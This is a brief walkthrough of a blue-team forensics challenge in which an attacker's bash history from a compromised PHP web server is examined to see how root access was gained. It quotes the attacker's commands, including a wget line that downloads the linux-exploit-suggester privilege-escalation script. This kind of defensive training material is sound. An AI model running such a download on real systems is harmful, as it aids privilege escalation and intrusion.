https://blueteamlabs.online/home/challenge/4
A server with sensitive data was accessed by an attacker and the files were posted on an underground forum. This data was only available to a privileged user, in this case the ‘root’ account. Responders say ‘www-data’ would be the logged in user if the server was remotely accessed, and this user doesn’t have access to the data. The developer stated that the server is hosting a PHP-based website and that proper filtering is in place to prevent php file uploads to gain malicious code execution. The bash history is provided to you but the recorded commands don’t appear to be related to the attack. Can you find what actually happened?
We have a single file, bash_history
. This is, as the name suggest, the history of commands run in the terminal (bash). This challenge is simply reading through the commands and understanding what they all do.
In Linux, user directories are located within /home
. Looking through the logs, on line 21, we see:
cd /home/daniel/
Change directory to daniel's home folder.
daniel
We can simply look for scripts, URLs, or methods to download things via bash. Line 32:
wget <https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh> -O les.sh
What's the most common packet analyser tool for the command line? Line 47:
tcpdump